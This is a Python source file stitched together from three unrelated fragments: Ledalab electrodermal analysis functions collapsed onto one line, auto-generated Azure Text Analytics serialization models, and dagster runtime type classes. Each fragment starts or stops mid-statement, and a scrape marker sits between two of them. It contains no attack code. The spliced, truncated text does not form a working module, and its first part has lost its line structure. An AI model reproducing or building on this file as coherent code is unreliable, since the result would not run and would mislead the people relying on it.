""" Ledalab analysis functions (original folder: Ledalab/analyze) """ from __future__ import division import numpy as np from numpy import array as npa import math from scipy import stats from scipy.signal import convolve from scipy import interpolate from scipy.linalg import norm from . import leda2 from . import utils def cgd(start_val, error_fcn, h, crit_error, crit_iter, crit_h): """ Original location: analyze/cg/cgd.m """ x = start_val (newerror, _0) = error_fcn(x) error = npa(newerror) h = npa(h) jiter = 0 while True: olderror = newerror # GET GRADIENT if jiter == 0: gradient = cgd_get_gradient(x, olderror, error_fcn, h) direction = -gradient if len(gradient) == 0: break else: new_gradient = cgd_get_gradient(x, olderror, error_fcn, h) # no conjugation direction = -new_gradient if np.any(direction): # LINESEARCH [x, newerror, step] = cgd_linesearch(x, olderror, direction, error_fcn, h) error_diff = newerror - olderror else: error_diff = 0 # empty gradient error = np.hstack((error, newerror)) if jiter > crit_iter: break if error_diff > -crit_error: # no improvement h = h / 2 if np.all(h < crit_h): break jiter += 1 return (x, error) def cgd_get_gradient(x, error0, error_fcn, h): """ Original location: analyze/cg/cgd_get_gradient.m """ Npars = len(x) gradient = np.zeros(Npars) for i in range(Npars): xc = npa(x) xc[i] = xc[i] + h[i] (error1, _0) = error_fcn(xc) if error1 < error0: gradient[i] = (error1 - error0) else: # try opposite direction xc = npa(x) xc[i] = xc[i] - h[i] (error1, _0) = error_fcn(xc) if error1 < error0: gradient[i] = -(error1 - error0) else: gradient[i] = 0 return gradient def succnz(data, crit, fac, sr): """ Original location: analyze/deconvolution/succnz.m """ n = len(data) abovecrit = np.abs(data) > crit nzidx = np.flatnonzero(np.diff(abovecrit)) + 1 if len(nzidx) == 0: return 0 if abovecrit[0] == 1: nzidx = np.hstack((1, nzidx)) if abovecrit[-1] == 1: nzidx = np.hstack((nzidx, n+1)) nzL = nzidx[np.arange(1, len(nzidx), 2)] - 
nzidx[np.arange(0, len(nzidx), 2)] return np.sum(pow(nzL / sr, fac) / (n / sr)) def cgd_linesearch(x, error0, direction, error_fcn, h): """ Original location: analyze/cg/cgd_linesearch """ direction_n = direction / norm(direction, 2) error_list = npa(error0) stepsize = h maxSteps = 6 count = 0 factor = npa([0]) for iStep in range(1, maxSteps): factor = np.hstack((factor, pow(2, (iStep - 1)))) xc = x + (direction_n * stepsize) * factor[iStep] (catVal, xc) = error_fcn(xc) # xc may be changed due to limits error_list = np.hstack((error_list, catVal)) if error_list[-1] >= error_list[-2]: # end of decline if iStep == 1: # no success step = 0 error1 = npa(error0) else: # parabolic p = np.polyfit(factor, error_list, 2) fx = np.arange(factor[0], factor[-1] + .1, .1) fy = np.polyval(p, fx) idx = np.argmin(fy) fxm = fx[idx] xcm = x + (direction_n * stepsize) * fxm (error1, xcm) = error_fcn(xcm) # xc may be changed due to limits if error1 < error_list[iStep - 1]: xc = xcm step = fxm else: # finding Minimum did not work xc = x + (direction_n * stepsize) * factor[iStep - 1] # before last point (error1, xc) = error_fcn(xc) # recalculate error in order to check for limits again step = factor[iStep - 1] return (xc, error1, step) count = iStep step = factor[count] error1 = error_list[count] return (xc, error1, step) def segment_driver(data, remd, ndiff, sigc, segmWidth): """ Orignal location: analyze/deconvolution/segment_driver.m """ """ SKIPPING SINCE UNUSED segmOnset = npa([]) segmImpulse = list() segmOversh = list() impMin = npa([]) impMax = npa([]) """ (cccrimin, cccrimax) = utils.get_peaks(data) if len(cccrimax) == 0: return None (minL, maxL) = signpeak(data, cccrimin, cccrimax, sigc) """ SKIPPING SINCE UNUSED - BEWARE THE BUGS (rmdimin, rmdimax) = utils.get_peaks(remd) # get peaks of remainder (rmdimins, rmdimaxs) = deconvolution.signpeak(remd, rmdimin, rmdimax, .005) # get remainder segments # Segments: 12 sec, max 3 sec preceding maximum for i in range(len(maxL)): 
segm_start = np.maximum(minL[i, 0], maxL[i] - round(segmWidth / 2)) segm_end = np.minimum(segm_start + segmWidth - 1, len(data)) # impulse segm_idx = range(int(segm_start), int(segm_end)) segm_data = npa(data[segm_idx]) segm_idx_above = np.nonzero(segm_idx >= minL[i, 1]) segm_data[segm_idx_above] = 0 segmOnset = np.hstack((segmOnset, segm_start)) segmImpulse.append(segm_data) # overshoot oversh_data = np.zeros(len(segm_idx)) if i < len(maxL): rmi = np.flatnonzero(np.logical_and(rmdimaxs > maxL[i], rmdimaxs < maxL[i + 1])) else: rmi = np.flatnonzero(rmdimaxs > maxL[i]) # no zero overshoots if rmi.size == 0: if i < len(maxL): rmi = np.flatnonzero(np.logical_and(rmdimax > maxL[i], rmdimax < maxL[i + 1])) else: rmi = np.flatnonzero(rmdimax > maxL[i]) rmdimaxs = npa(rmdimax) if rmdimin is not None: rmdimins = np.hstack((rmdimin[:-1], rmdimin[1:])) if rmi.size > 0: rmi = rmi[0] oversh_start = np.maximum(rmdimins[rmi, 0], segm_start) oversh_end = np.minimum(rmdimins[rmi, 1], segm_end) # min(rmdimins(rmi+1), segm_end); oversh_idx = np.arange((oversh_start - segm_start + 1), len(oversh_data) - (segm_end - oversh_end) + 1) oversh_data[oversh_idx] = remd[oversh_start:oversh_end + 1] segmOversh.append(oversh_data) #return (segmOnset, segmImpulse, segmOversh, impMin, impMax) """ return (minL, maxL) def fiterror(data, fit, npar): """ npars = number of unfree parameters with df = n - npar 'MSE' method only supported data and fit must be numpy arrays (row vectors) """ if not isinstance(data, np.ndarray): raise ValueError('data is not a numpy array') if not isinstance(fit, np.ndarray): raise ValueError('fit is not a numpy array') residual = data - fit n = len(data) SSE = np.sum(pow(residual, 2)) return SSE / n def bateman(time, onset, amp, tau1, tau2): """ original location: analyze/template/bateman.m time must be a numpy array """ if not isinstance(time, np.ndarray): time = npa(time) if tau1 < 0 or tau2 < 0: raise ValueError('tau1 or tau2 < 0: ({:f}, {:f})'.format(tau1, tau2)) if 
tau1 == tau2: raise ValueError('tau1 == tau2 == {:f}'.format(tau1)) conductance = np.zeros(time.shape) rang = np.flatnonzero(time > onset) if len(rang) == 0: return None xr = time[rang] - onset if amp > 0: maxx = tau1 * tau2 * math.log(tau1 / tau2) / (tau1 - tau2) # b' = 0 maxamp = abs(math.exp(-maxx / tau2) - math.exp(-maxx / tau1)) c = amp / maxamp else: # amp == 0: normalized bateman, area(bateman) = 1/sr sr = round(1 / np.mean(np.diff(time))) c = 1 / ((tau2 - tau1) * sr) if tau1 > 0: conductance[rang] = c * (np.exp(-xr / tau2) - np.exp(-xr / tau1)) else: conductance[rang] = c * np.exp(-xr / tau2) return conductance def bateman_gauss(time, onset, amp, tau1, tau2, sigma): """ Original location: analyze/template/bateman_gauss.m """ component = bateman(time, onset, 0, tau1, tau2) if sigma > 0: sr = round(1 / np.mean(np.diff(time))) winwidth2 = int(np.ceil(sr * sigma * 4)) # round half winwidth: 4 SD to each side t = np.arange(1, (winwidth2 * 2 + 2)) # odd number (2*winwidth-half+1) + 2 because of numpy's arange implementation g = stats.norm.pdf(t, winwidth2 + 1, sigma * sr) g = g / np.max(g) * amp bg = convolve(np.hstack(((np.zeros(winwidth2) + 1) * component[0], component, (np.zeros(winwidth2) + 1) * component[-1])), g) component = bg[(winwidth2 * 2): -winwidth2 * 2] return component def trough2peak_analysis(): ds = leda2.data.conductance_smoothData t = leda2.data.time_data (minL, maxL) = utils.get_peaks(ds) minL = minL[:len(maxL)] leda2.trough2peakAnalysis.onset = t[minL] leda2.trough2peakAnalysis.peaktime = t[maxL] leda2.trough2peakAnalysis.onset_idx = minL leda2.trough2peakAnalysis.peaktime_idx = maxL leda2.trough2peakAnalysis.amp = ds[maxL] - ds[minL] def sdeco_interimpulsefit(driver, kernel, minL, maxL): """ Original location > analyze>decomposition>sdeco_interimpulsefit.m all parameters must be numpy arrays """ t = leda2.analysis0.target.t d = leda2.analysis0.target.d sr = leda2.analysis0.target.sr tonicGridSize = leda2.settings.tonicGridSize_sdeco nKernel = 
len(kernel) # Get inter-impulse data index iif_idx = npa([]) if len(maxL) > 2: for i in range(len(maxL) - 1): gap_idx = np.arange(minL[i, 1], minL[i + 1, 0]) if gap_idx.size == 0: gap_idx = minL[i, 1] iif_idx = np.hstack((iif_idx, gap_idx)) iif_idx = np.hstack((minL[1, 0], iif_idx, np.arange(minL[-1, 1], len(driver) - sr))) else: # no peaks (exept for pre-peak and may last peak) so data represents tonic only, so ise all data for tonic estimation iif_idx = np.flatnonzero(t > 0) iif_idx = [x for x in iif_idx.astype(int)] iif_t = t[iif_idx] iif_data = driver[iif_idx] groundtime = np.hstack((np.arange(0, t[-2], tonicGridSize), t[-1])) if tonicGridSize < 30: tonicGridSize = tonicGridSize * 2 groundlevel = npa([]) for i in range(len(groundtime)): # Select relevant interimpulse time points for tonic estimate at groundtime if i == 0: t_idx = np.logical_and(iif_t <= groundtime[i] + tonicGridSize, iif_t > 1) grid_idx = np.logical_and(t <= groundtime[i] + tonicGridSize, t > 1) elif i +
Required. Number of transactions for the request.
    :type transactions_count: long
    """

    # Auto-generated (AutoRest) serialization metadata — do not edit by hand.
    _validation = {
        'documents_count': {'required': True},
        'valid_documents_count': {'required': True},
        'erroneous_documents_count': {'required': True},
        'transactions_count': {'required': True},
    }

    _attribute_map = {
        'documents_count': {'key': 'documentsCount', 'type': 'int'},
        'valid_documents_count': {'key': 'validDocumentsCount', 'type': 'int'},
        'erroneous_documents_count': {'key': 'erroneousDocumentsCount', 'type': 'int'},
        'transactions_count': {'key': 'transactionsCount', 'type': 'long'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(RequestStatistics, self).__init__(**kwargs)
        self.documents_count = kwargs['documents_count']
        self.valid_documents_count = kwargs['valid_documents_count']
        self.erroneous_documents_count = kwargs['erroneous_documents_count']
        self.transactions_count = kwargs['transactions_count']


class SentenceAspect(msrest.serialization.Model):
    """SentenceAspect.

    All required parameters must be populated in order to send to Azure.

    :param sentiment: Required. Aspect level sentiment for the aspect in the sentence. Possible
     values include: "positive", "mixed", "negative".
    :type sentiment: str or ~azure.ai.textanalytics.v3_1_preview_3.models.TokenSentimentValue
    :param confidence_scores: Required. Aspect level sentiment confidence scores for the aspect in
     the sentence.
    :type confidence_scores:
     ~azure.ai.textanalytics.v3_1_preview_3.models.AspectConfidenceScoreLabel
    :param offset: Required. The aspect offset from the start of the sentence.
    :type offset: int
    :param length: Required. The length of the aspect.
    :type length: int
    :param text: Required. The aspect text detected.
    :type text: str
    :param relations: Required. The array of either opinion or aspect object which is related to
     the aspect.
    :type relations: list[~azure.ai.textanalytics.v3_1_preview_3.models.AspectRelation]
    """

    _validation = {
        'sentiment': {'required': True},
        'confidence_scores': {'required': True},
        'offset': {'required': True},
        'length': {'required': True},
        'text': {'required': True},
        'relations': {'required': True},
    }

    _attribute_map = {
        'sentiment': {'key': 'sentiment', 'type': 'str'},
        'confidence_scores': {'key': 'confidenceScores', 'type': 'AspectConfidenceScoreLabel'},
        'offset': {'key': 'offset', 'type': 'int'},
        'length': {'key': 'length', 'type': 'int'},
        'text': {'key': 'text', 'type': 'str'},
        'relations': {'key': 'relations', 'type': '[AspectRelation]'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(SentenceAspect, self).__init__(**kwargs)
        self.sentiment = kwargs['sentiment']
        self.confidence_scores = kwargs['confidence_scores']
        self.offset = kwargs['offset']
        self.length = kwargs['length']
        self.text = kwargs['text']
        self.relations = kwargs['relations']


class SentenceOpinion(msrest.serialization.Model):
    """SentenceOpinion.

    All required parameters must be populated in order to send to Azure.

    :param sentiment: Required. Opinion level sentiment for the aspect in the sentence. Possible
     values include: "positive", "mixed", "negative".
    :type sentiment: str or ~azure.ai.textanalytics.v3_1_preview_3.models.TokenSentimentValue
    :param confidence_scores: Required. Opinion level sentiment confidence scores for the aspect in
     the sentence.
    :type confidence_scores:
     ~azure.ai.textanalytics.v3_1_preview_3.models.AspectConfidenceScoreLabel
    :param offset: Required. The opinion offset from the start of the sentence.
    :type offset: int
    :param length: Required. The length of the opinion.
    :type length: int
    :param text: Required. The aspect text detected.
    :type text: str
    :param is_negated: Required. The indicator representing if the opinion is negated.
    :type is_negated: bool
    """

    _validation = {
        'sentiment': {'required': True},
        'confidence_scores': {'required': True},
        'offset': {'required': True},
        'length': {'required': True},
        'text': {'required': True},
        'is_negated': {'required': True},
    }

    _attribute_map = {
        'sentiment': {'key': 'sentiment', 'type': 'str'},
        'confidence_scores': {'key': 'confidenceScores', 'type': 'AspectConfidenceScoreLabel'},
        'offset': {'key': 'offset', 'type': 'int'},
        'length': {'key': 'length', 'type': 'int'},
        'text': {'key': 'text', 'type': 'str'},
        'is_negated': {'key': 'isNegated', 'type': 'bool'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(SentenceOpinion, self).__init__(**kwargs)
        self.sentiment = kwargs['sentiment']
        self.confidence_scores = kwargs['confidence_scores']
        self.offset = kwargs['offset']
        self.length = kwargs['length']
        self.text = kwargs['text']
        self.is_negated = kwargs['is_negated']


class SentenceSentiment(msrest.serialization.Model):
    """SentenceSentiment.

    All required parameters must be populated in order to send to Azure.

    :param text: Required. The sentence text.
    :type text: str
    :param sentiment: Required. The predicted Sentiment for the sentence. Possible values include:
     "positive", "neutral", "negative".
    :type sentiment: str or ~azure.ai.textanalytics.v3_1_preview_3.models.SentenceSentimentValue
    :param confidence_scores: Required. The sentiment confidence score between 0 and 1 for the
     sentence for all classes.
    :type confidence_scores:
     ~azure.ai.textanalytics.v3_1_preview_3.models.SentimentConfidenceScorePerLabel
    :param offset: Required. The sentence offset from the start of the document.
    :type offset: int
    :param length: Required. The length of the sentence.
    :type length: int
    :param aspects: The array of aspect object for the sentence.
    :type aspects: list[~azure.ai.textanalytics.v3_1_preview_3.models.SentenceAspect]
    :param opinions: The array of opinion object for the sentence.
    :type opinions: list[~azure.ai.textanalytics.v3_1_preview_3.models.SentenceOpinion]
    """

    _validation = {
        'text': {'required': True},
        'sentiment': {'required': True},
        'confidence_scores': {'required': True},
        'offset': {'required': True},
        'length': {'required': True},
    }

    _attribute_map = {
        'text': {'key': 'text', 'type': 'str'},
        'sentiment': {'key': 'sentiment', 'type': 'str'},
        'confidence_scores': {'key': 'confidenceScores', 'type': 'SentimentConfidenceScorePerLabel'},
        'offset': {'key': 'offset', 'type': 'int'},
        'length': {'key': 'length', 'type': 'int'},
        'aspects': {'key': 'aspects', 'type': '[SentenceAspect]'},
        'opinions': {'key': 'opinions', 'type': '[SentenceOpinion]'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(SentenceSentiment, self).__init__(**kwargs)
        self.text = kwargs['text']
        self.sentiment = kwargs['sentiment']
        self.confidence_scores = kwargs['confidence_scores']
        self.offset = kwargs['offset']
        self.length = kwargs['length']
        self.aspects = kwargs.get('aspects', None)
        self.opinions = kwargs.get('opinions', None)


class SentimentConfidenceScorePerLabel(msrest.serialization.Model):
    """Represents the confidence scores between 0 and 1 across all sentiment classes: positive, neutral, negative.

    All required parameters must be populated in order to send to Azure.

    :param positive: Required.
    :type positive: float
    :param neutral: Required.
    :type neutral: float
    :param negative: Required.
    :type negative: float
    """

    _validation = {
        'positive': {'required': True},
        'neutral': {'required': True},
        'negative': {'required': True},
    }

    _attribute_map = {
        'positive': {'key': 'positive', 'type': 'float'},
        'neutral': {'key': 'neutral', 'type': 'float'},
        'negative': {'key': 'negative', 'type': 'float'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(SentimentConfidenceScorePerLabel, self).__init__(**kwargs)
        self.positive = kwargs['positive']
        self.neutral = kwargs['neutral']
        self.negative = kwargs['negative']


class SentimentResponse(msrest.serialization.Model):
    """SentimentResponse.

    All required parameters must be populated in order to send to Azure.

    :param documents: Required. Sentiment analysis per document.
    :type documents: list[~azure.ai.textanalytics.v3_1_preview_3.models.DocumentSentiment]
    :param errors: Required. Errors by document id.
    :type errors: list[~azure.ai.textanalytics.v3_1_preview_3.models.DocumentError]
    :param statistics: if showStats=true was specified in the request this field will contain
     information about the request payload.
    :type statistics: ~azure.ai.textanalytics.v3_1_preview_3.models.RequestStatistics
    :param model_version: Required. This field indicates which model is used for scoring.
    :type model_version: str
    """

    _validation = {
        'documents': {'required': True},
        'errors': {'required': True},
        'model_version': {'required': True},
    }

    _attribute_map = {
        'documents': {'key': 'documents', 'type': '[DocumentSentiment]'},
        'errors': {'key': 'errors', 'type': '[DocumentError]'},
        'statistics': {'key': 'statistics', 'type': 'RequestStatistics'},
        'model_version': {'key': 'modelVersion', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(SentimentResponse, self).__init__(**kwargs)
        self.documents = kwargs['documents']
        self.errors = kwargs['errors']
        self.statistics = kwargs.get('statistics', None)
        self.model_version = kwargs['model_version']


class TasksStateTasks(msrest.serialization.Model):
    """TasksStateTasks.

    All required parameters must be populated in order to send to Azure.

    :param details:
    :type details: ~azure.ai.textanalytics.v3_1_preview_3.models.TaskState
    :param completed: Required.
    :type completed: int
    :param failed: Required.
    :type failed: int
    :param in_progress: Required.
    :type in_progress: int
    :param total: Required.
    :type total: int
    :param entity_recognition_tasks:
    :type entity_recognition_tasks:
     list[~azure.ai.textanalytics.v3_1_preview_3.models.TasksStateTasksEntityRecognitionTasksItem]
    :param entity_recognition_pii_tasks:
    :type entity_recognition_pii_tasks:
     list[~azure.ai.textanalytics.v3_1_preview_3.models.TasksStateTasksEntityRecognitionPiiTasksItem]
    :param key_phrase_extraction_tasks:
    :type key_phrase_extraction_tasks:
     list[~azure.ai.textanalytics.v3_1_preview_3.models.TasksStateTasksKeyPhraseExtractionTasksItem]
    """

    _validation = {
        'completed': {'required': True},
        'failed': {'required': True},
        'in_progress': {'required': True},
        'total': {'required': True},
    }

    _attribute_map = {
        'details': {'key': 'details', 'type': 'TaskState'},
        'completed': {'key': 'completed', 'type': 'int'},
        'failed': {'key': 'failed', 'type': 'int'},
        'in_progress': {'key': 'inProgress', 'type': 'int'},
        'total': {'key': 'total', 'type': 'int'},
        'entity_recognition_tasks': {'key': 'entityRecognitionTasks', 'type': '[TasksStateTasksEntityRecognitionTasksItem]'},
        'entity_recognition_pii_tasks': {'key': 'entityRecognitionPiiTasks', 'type': '[TasksStateTasksEntityRecognitionPiiTasksItem]'},
        'key_phrase_extraction_tasks': {'key': 'keyPhraseExtractionTasks', 'type': '[TasksStateTasksKeyPhraseExtractionTasksItem]'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(TasksStateTasks, self).__init__(**kwargs)
        self.details = kwargs.get('details', None)
        self.completed = kwargs['completed']
        self.failed = kwargs['failed']
        self.in_progress = kwargs['in_progress']
        self.total = kwargs['total']
        self.entity_recognition_tasks = kwargs.get('entity_recognition_tasks', None)
        self.entity_recognition_pii_tasks = kwargs.get('entity_recognition_pii_tasks', None)
        self.key_phrase_extraction_tasks = kwargs.get('key_phrase_extraction_tasks', None)


class TaskState(msrest.serialization.Model):
    """TaskState.

    All required parameters must be populated in order to send to Azure.

    :param last_update_date_time: Required.
    :type last_update_date_time: ~datetime.datetime
    :param name:
    :type name: str
    :param status: Required. Possible values include: "notStarted", "running", "succeeded",
     "failed", "rejected", "cancelled", "cancelling", "partiallyCompleted".
    :type status: str or ~azure.ai.textanalytics.v3_1_preview_3.models.State
    """

    _validation = {
        'last_update_date_time': {'required': True},
        'status': {'required': True},
    }

    _attribute_map = {
        'last_update_date_time': {'key': 'lastUpdateDateTime', 'type': 'iso-8601'},
        'name': {'key': 'name', 'type': 'str'},
        'status': {'key': 'status', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(TaskState, self).__init__(**kwargs)
        self.last_update_date_time = kwargs['last_update_date_time']
        self.name = kwargs.get('name', None)
        self.status = kwargs['status']


class TasksStateTasksDetails(TaskState):
    """TasksStateTasksDetails.

    All required parameters must be populated in order to send to Azure.

    :param last_update_date_time: Required.
    :type last_update_date_time: ~datetime.datetime
    :param name:
    :type name: str
    :param status: Required. Possible values include: "notStarted", "running", "succeeded",
     "failed", "rejected", "cancelled", "cancelling", "partiallyCompleted".
    :type status: str or ~azure.ai.textanalytics.v3_1_preview_3.models.State
    """

    _validation = {
        'last_update_date_time': {'required': True},
        'status': {'required': True},
    }

    _attribute_map = {
        'last_update_date_time': {'key': 'lastUpdateDateTime', 'type': 'iso-8601'},
        'name': {'key': 'name', 'type': 'str'},
        'status': {'key': 'status', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(TasksStateTasksDetails, self).__init__(**kwargs)


class TasksStateTasksEntityRecognitionPiiTasksItem(TaskState, Components15X8E9LSchemasTasksstatePropertiesTasksPropertiesEntityrecognitionpiitasksItemsAllof1):
    """TasksStateTasksEntityRecognitionPiiTasksItem.

    All required parameters must be populated in order to send to Azure.

    :param results: Required.
    :type results: ~azure.ai.textanalytics.v3_1_preview_3.models.PiiResult
    :param last_update_date_time: Required.
    :type last_update_date_time: ~datetime.datetime
    :param name:
    :type name: str
    :param status: Required. Possible values include: "notStarted", "running", "succeeded",
     "failed", "rejected", "cancelled", "cancelling", "partiallyCompleted".
    :type status: str or ~azure.ai.textanalytics.v3_1_preview_3.models.State
    """

    _validation = {
        'results': {'required': True},
        'last_update_date_time': {'required': True},
        'status': {'required': True},
    }

    # (fragment) chunk is cut off mid-dict here.
    _attribute_map = {
        'results': {'key': 'results', 'type': 'PiiResult'},
        'last_update_date_time': {'key': 'lastUpdateDateTime', 'type': 'iso-8601'},
        'name':
<gh_stars>0
# NOTE(review): the '<gh_stars>0' marker above is a dataset/scrape artifact,
# not Python — remove it before running this module.
import typing
from functools import partial

import six

from dagster import check
from dagster.core.storage.type_storage import TypeStoragePlugin

from .builtin_config_schemas import BuiltinSchemas
from .builtin_enum import BuiltinEnum
from .config import List as ConfigList
from .config import Nullable as ConfigNullable
from .config_schema import InputHydrationConfig, OutputMaterializationConfig
from .dagster_type import check_dagster_type_param
from .field_utils import Dict
from .marshal import PickleSerializationStrategy, SerializationStrategy
from .typing_api import (
    is_closed_python_dict_type,
    is_closed_python_set_type,
    is_closed_python_tuple_type,
)
from .wrapping import WrappingListType, WrappingNullableType


class RuntimeType(object):
    '''
    The class backing DagsterTypes as they are used during execution.
    '''

    def __init__(
        self,
        key,
        name,
        is_builtin=False,
        description=None,
        input_hydration_config=None,
        output_materialization_config=None,
        serialization_strategy=None,
        auto_plugins=None,
    ):
        # Subclasses are singletons: constructing the same subclass twice is a
        # programming error — callers must go through inst().
        type_obj = type(self)
        if type_obj in RuntimeType.__cache:
            check.failed(
                (
                    '{type_obj} already in cache. You **must** use the inst() class method '
                    'to construct RuntimeType and not the ctor'.format(type_obj=type_obj)
                )
            )

        self.key = check.str_param(key, 'key')
        self.name = check.opt_str_param(name, 'name')
        self.description = check.opt_str_param(description, 'description')
        self.input_hydration_config = check.opt_inst_param(
            input_hydration_config, 'input_hydration_config', InputHydrationConfig
        )
        self.output_materialization_config = check.opt_inst_param(
            output_materialization_config,
            'output_materialization_config',
            OutputMaterializationConfig,
        )
        # Falls back to pickle-based serialization when none is supplied.
        self.serialization_strategy = check.opt_inst_param(
            serialization_strategy,
            'serialization_strategy',
            SerializationStrategy,
            PickleSerializationStrategy(),
        )

        auto_plugins = check.opt_list_param(auto_plugins, 'auto_plugins', of_type=type)
        check.param_invariant(
            all(
                issubclass(auto_plugin_type, TypeStoragePlugin)
                for auto_plugin_type in auto_plugins
            ),
            'auto_plugins',
        )
        self.auto_plugins = auto_plugins

        self.is_builtin = check.bool_param(is_builtin, 'is_builtin')

    # Per-subclass singleton registry, keyed by the subclass object itself.
    __cache = {}

    @classmethod
    def inst(cls):
        # Lazily construct and memoize the singleton instance for cls.
        if cls not in RuntimeType.__cache:
            RuntimeType.__cache[cls] = cls()  # pylint: disable=E1120
        return RuntimeType.__cache[cls]

    @staticmethod
    def from_builtin_enum(builtin_enum):
        check.invariant(BuiltinEnum.contains(builtin_enum), 'must be member of BuiltinEnum')
        return _RUNTIME_MAP[builtin_enum]

    @property
    def display_name(self):
        return self.name

    def type_check(self, value):
        # Base type accepts everything; subclasses raise Failure on mismatch.
        pass

    @property
    def is_any(self):
        return False

    @property
    def is_scalar(self):
        return False

    @property
    def is_list(self):
        return False

    @property
    def is_nullable(self):
        return False

    @property
    def inner_types(self):
        return []

    @property
    def is_nothing(self):
        return False


class BuiltinScalarRuntimeType(RuntimeType):
    # Scalar builtins derive key/name from the subclass name (Int, Bool, ...).
    def __init__(self, *args, **kwargs):
        name = type(self).__name__
        super(BuiltinScalarRuntimeType, self).__init__(
            key=name, name=name, is_builtin=True, *args, **kwargs
        )

    @property
    def is_scalar(self):
        return True


class Int(BuiltinScalarRuntimeType):
    def __init__(self):
        super(Int, self).__init__(
            input_hydration_config=BuiltinSchemas.INT_INPUT,
            output_materialization_config=BuiltinSchemas.INT_OUTPUT,
        )

    def type_check(self, value):
        # Local import avoids a circular dependency with the events module.
        from dagster.core.definitions.events import Failure

        # six.integer_types also accepts `long` on Python 2.
        if not isinstance(value, six.integer_types):
            raise Failure(_typemismatch_error_str(value, 'int'))


def _typemismatch_error_str(value, expected_type_desc):
    # Shared human-readable message for all scalar type-check failures.
    return 'Value "{value}" of python type "{python_type}" must be a {type_desc}.'.format(
        value=value, python_type=type(value).__name__, type_desc=expected_type_desc
    )


def _throw_if_not_string(value):
    from dagster.core.definitions.events import Failure

    if not isinstance(value, six.string_types):
        raise Failure(_typemismatch_error_str(value, 'string'))


class String(BuiltinScalarRuntimeType):
    def __init__(self):
        super(String, self).__init__(
            input_hydration_config=BuiltinSchemas.STRING_INPUT,
            output_materialization_config=BuiltinSchemas.STRING_OUTPUT,
        )

    def type_check(self, value):
        _throw_if_not_string(value)


class Path(BuiltinScalarRuntimeType):
    # Paths are plain strings at runtime; only the config schema differs.
    def __init__(self):
        super(Path, self).__init__(
            input_hydration_config=BuiltinSchemas.PATH_INPUT,
            output_materialization_config=BuiltinSchemas.PATH_OUTPUT,
        )

    def type_check(self, value):
        _throw_if_not_string(value)


class Float(BuiltinScalarRuntimeType):
    def __init__(self):
        super(Float, self).__init__(
            input_hydration_config=BuiltinSchemas.FLOAT_INPUT,
            output_materialization_config=BuiltinSchemas.FLOAT_OUTPUT,
        )

    def type_check(self, value):
        from dagster.core.definitions.events import Failure

        # NOTE(review): rejects ints — isinstance(value, float) only.
        if not isinstance(value, float):
            raise Failure(_typemismatch_error_str(value, 'float'))


class Bool(BuiltinScalarRuntimeType):
    def __init__(self):
        super(Bool, self).__init__(
            input_hydration_config=BuiltinSchemas.BOOL_INPUT,
            output_materialization_config=BuiltinSchemas.BOOL_OUTPUT,
        )

    def type_check(self, value):
        from dagster.core.definitions.events import Failure

        if not isinstance(value, bool):
            raise Failure(_typemismatch_error_str(value, 'bool'))


class Anyish(RuntimeType):
    # Base for types that accept any value (no type_check override).
    def __init__(
        self,
        key,
        name,
        input_hydration_config=None,
        output_materialization_config=None,
        is_builtin=False,
        description=None,
    ):
        super(Anyish, self).__init__(
            key=key,
            name=name,
            input_hydration_config=input_hydration_config,
            output_materialization_config=output_materialization_config,
            is_builtin=is_builtin,
            description=description,
        )

    @property
    def is_any(self):
        return True


class Any(Anyish):
    def __init__(self):
        super(Any, self).__init__(
            key='Any',
            name='Any',
            input_hydration_config=BuiltinSchemas.ANY_INPUT,
            output_materialization_config=BuiltinSchemas.ANY_OUTPUT,
            is_builtin=True,
        )


def define_any_type(name, description=None):
    # Returns a new Anyish subclass (not an instance) named after `name`.
    class NamedAnyType(Anyish):
        def __init__(self):
            super(NamedAnyType, self).__init__(key=name, name=name, description=description)

    return NamedAnyType


class Nothing(RuntimeType):
    # Marker type for solids that yield no value; only None passes its check.
    def __init__(self):
        super(Nothing, self).__init__(
            key='Nothing',
            name='Nothing',
            input_hydration_config=None,
            output_materialization_config=None,
            is_builtin=True,
        )

    @property
    def is_nothing(self):
        return True

    def type_check(self, value):
        from dagster.core.definitions.events import Failure

        if value is not None:
            # NOTE(review): '{value}' placeholder is never formatted — the
            # message prints literally; should be .format(value=value).
            raise Failure('Value {value} must be None.')


class PythonObjectType(RuntimeType):
    # Wraps an existing Python class as a Dagster type; the default check is
    # isinstance against python_type unless a custom type_check is supplied.
    def __init__(
        self,
        python_type=None,
        key=None,
        name=None,
        typecheck_metadata_fn=None,
        type_check=None,
        **kwargs
    ):
        name = check.opt_str_param(name, 'name', type(self).__name__)
        key = check.opt_str_param(key, 'key', name)
        super(PythonObjectType, self).__init__(key=key, name=name, **kwargs)
        self.python_type = check.type_param(python_type, 'python_type')
        self.typecheck_metadata_fn = check.opt_callable_param(
            typecheck_metadata_fn, 'typecheck_metadata_fn'
        )
        self._user_type_check = check.opt_callable_param(type_check, 'type_check')

    def type_check(self, value):
        from dagster.core.definitions.events import Failure

        # A user-supplied check fully replaces the isinstance check.
        if self._user_type_check is not None:
            self._user_type_check(value)
        elif not isinstance(value, self.python_type):
            raise Failure(
                'Value of type {value_type} failed type check for Dagster type {dagster_type}, '
                'expected value to be of Python type {expected_type}.'.format(
                    value_type=type(value),
                    dagster_type=self.name,
                    expected_type=self.python_type.__name__,
                )
            )

        if self.typecheck_metadata_fn:
            return self.typecheck_metadata_fn(value)


# Shared Args: section spliced into define_python_dagster_type's doc text.
PYTHON_DAGSTER_TYPE_ARGS_DOCSTRING = '''Args:
    python_type (cls): The python type to wrap as a Dagster type.
    name (Optional[str]): Name of the new Dagster type. If None, the name (__name__) of
        the python_type will be used. Default: None
    description (Optional[str]): A user-readable description of the type. Default: None.
    input_hydration_config (Optional[InputHydrationConfig]): An instance of a class that
        inherits from :py:class:`InputHydrationConfig <dagster.InputHydrationConfig>` and
        can map config data to a value of this type. Specify this argument if you will need
        to shim values of this type using the config machinery. As a rule, you should use the
        :py:func:`@input_hydration_config <dagster.InputHydrationConfig>` decorator to construct
        these arguments. Default: None
    output_materialization_config (Optiona[OutputMaterializationConfig]): An instance of a class
        that inherits from
